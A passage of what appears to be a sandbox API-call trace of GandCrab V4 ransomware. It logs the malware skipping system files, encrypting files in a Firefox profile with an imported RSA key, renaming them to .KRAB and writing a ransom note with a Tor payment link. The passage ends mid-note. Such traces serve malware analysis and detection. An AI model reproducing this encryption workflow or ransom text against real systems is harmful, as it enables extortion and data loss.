[0080.746] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a08d2ca4dee3d.lock" [0080.746] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.746] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 128 [0080.746] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a08d2ca4dee3d.lock") returned 123 [0080.746] lstrlenW (lpString=".lock") returned 5 [0080.746] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0080.746] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0080.746] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.747] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.747] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0080.747] lstrcmpW (lpString1="gmpopenh264.dll", lpString2=".") returned 1 [0080.747] lstrcmpW (lpString1="gmpopenh264.dll", lpString2="..") returned 1 [0080.747] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\", lpString2="gmpopenh264.dll" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.dll") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.dll" [0080.747] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.747] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.dll.KRAB") returned 120 [0080.747] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.dll") returned 115 [0080.747] lstrlenW (lpString=".dll") returned 4 [0080.747] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0080.748] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".dll ") returned 5 [0080.748] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.748] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.748] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0080.748] lstrcmpW (lpString1="gmpopenh264.info", lpString2=".") returned 1 [0080.748] lstrcmpW (lpString1="gmpopenh264.info", lpString2="..") returned 1 [0080.748] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\", lpString2="gmpopenh264.info" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info" [0080.748] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.748] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info.KRAB") returned 121 [0080.749] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info") returned 116 [0080.749] lstrlenW (lpString=".info") returned 5 [0080.749] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0080.749] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".info ") returned 6 [0080.749] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.749] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info") returned 116 [0080.749] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info") returned 116 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="desktop.ini") returned 1 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="autorun.inf") returned 1 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="ntuser.dat") returned -1 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="iconcache.db") returned -1 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="bootsect.bak") returned 1 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="boot.ini") returned 1 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="ntuser.dat.log") returned -1 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="thumbs.db") returned -1 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="KRAB-DECRYPT.html") returned -1 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="CRAB-DECRYPT.txt") returned 1 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="ntldr") returned -1 [0080.749] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="NTDETECT.COM") returned -1 [0080.750] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="Bootfont.bin") returned 1 [0080.750] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0080.750] CryptAcquireContextW (in: phProv=0x338dfb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfb4*=0x1011ab8) returned 1 [0080.751] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0080.752] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.752] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.752] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338e04c | out: pbBuffer=0x338e04c) returned 1 [0080.752] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0080.752] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.752] CryptAcquireContextW (in: phProv=0x338dfb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfb4*=0x1012668) returned 1 [0080.754] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0080.754] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.754] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.754] CryptGenRandom (in: hProv=0x1012668, dwLen=0x8, pbBuffer=0x338e06c | out: pbBuffer=0x338e06c) returned 1 [0080.754] CryptReleaseContext (hProv=0x1012668, dwFlags=0x0) returned 1 [0080.754] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.755] CryptAcquireContextW (in: phProv=0x338dfac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfac*=0x1012668) returned 1 [0080.756] CryptImportKey (in: hProv=0x1012668, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dfb0 | out: phKey=0x338dfb0*=0x1023e38) returned 1 [0080.756] CryptGetKeyParam (in: hKey=0x1023e38, dwParam=0x8, pbData=0x338dfa4, pdwDataLen=0x338dfa8, dwFlags=0x0 | out: pbData=0x338dfa4*=0x800, pdwDataLen=0x338dfa8*=0x4) returned 1 [0080.756] CryptEncrypt (in: hKey=0x1023e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338dfdc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338dfdc*=0x100) returned 1 [0080.757] GetLastError () returned 0x0 [0080.757] CryptDestroyKey (hKey=0x1023e38) returned 1 [0080.757] CryptReleaseContext (hProv=0x1012668, dwFlags=0x0) returned 1 [0080.757] CryptAcquireContextW (in: phProv=0x338dfac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfac*=0x1011ab8) returned 1 [0080.807] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dfb0 | out: phKey=0x338dfb0*=0x10231f8) returned 1 [0080.808] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338dfa4, pdwDataLen=0x338dfa8, dwFlags=0x0 | out: pbData=0x338dfa4*=0x800, pdwDataLen=0x338dfa8*=0x4) returned 1 [0080.808] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338dfdc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338dfdc*=0x100) returned 1 [0080.808] GetLastError () returned 0x0 [0080.808] CryptDestroyKey (hKey=0x10231f8) returned 1 [0080.808] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0080.808] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0080.811] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0080.811] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0080.812] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e07c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e07c*=0x74, lpOverlapped=0x0) returned 1 [0080.854] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffff8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.854] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x338e078, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e078*=0x74, lpOverlapped=0x0) returned 1 [0080.854] WriteFile (in: hFile=0x484, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e078, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e078*=0x208, lpOverlapped=0x0) returned 1 [0080.902] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.906] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.906] CloseHandle (hObject=0x484) returned 1 [0080.908] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.908] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info.krab")) returned 1 [0080.909] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.910] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0080.910] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0080.910] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0080.910] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\KRAB-DECRYPT.txt" [0080.910] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.910] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\KRAB-DECRYPT.txt.KRAB") returned 121 [0080.910] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\KRAB-DECRYPT.txt") returned 116 [0080.910] lstrlenW (lpString=".txt") returned 4 [0080.910] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0080.911] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0080.911] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.911] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\KRAB-DECRYPT.txt") returned 116 [0080.911] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\KRAB-DECRYPT.txt") returned 116 [0080.911] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0080.911] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0080.911] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0080.911] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0080.911] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0080.911] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0080.911] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0080.911] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0080.911] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0080.911] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0080.911] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.912] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0 [0080.912] FindClose (in: hFindFile=0x1023df8 | out: hFindFile=0x1023df8) returned 1 [0080.912] CloseHandle (hObject=0x720) returned 1 [0080.912] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0080.912] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0080.912] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0080.913] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a08d2ca4dee3d.lock" [0080.913] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.913] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 124 [0080.913] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a08d2ca4dee3d.lock") returned 119 [0080.913] lstrlenW (lpString=".lock") returned 5 [0080.913] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0080.913] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0080.914] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.914] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.914] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0080.914] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0080.914] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0080.915] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\KRAB-DECRYPT.txt" [0080.915] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.915] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\KRAB-DECRYPT.txt.KRAB") returned 117 [0080.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\KRAB-DECRYPT.txt") returned 112 [0080.915] lstrlenW (lpString=".txt") returned 4 [0080.915] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0080.915] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0080.915] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.916] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\KRAB-DECRYPT.txt") returned 112 [0080.916] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\KRAB-DECRYPT.txt") returned 112 [0080.916] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0080.916] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0080.916] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0080.916] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0080.916] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0080.916] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0080.916] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0080.916] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0080.916] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0080.916] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0080.916] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.916] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0080.917] FindClose (in: hFindFile=0x1023cb8 | out: hFindFile=0x1023cb8) returned 1 [0080.917] CloseHandle (hObject=0x7ec) returned 1 [0080.917] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0080.917] lstrcmpW (lpString1="gmp-widevinecdm", lpString2=".") returned 1 [0080.917] lstrcmpW (lpString1="gmp-widevinecdm", lpString2="..") returned 1 [0080.917] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="gmp-widevinecdm" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm" [0080.917] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\" [0080.917] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0080.918] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0080.933] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0080.933] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0080.933] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0080.933] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.933] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.934] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\\\KRAB-DECRYPT.txt") returned 113 [0080.934] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0080.937] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 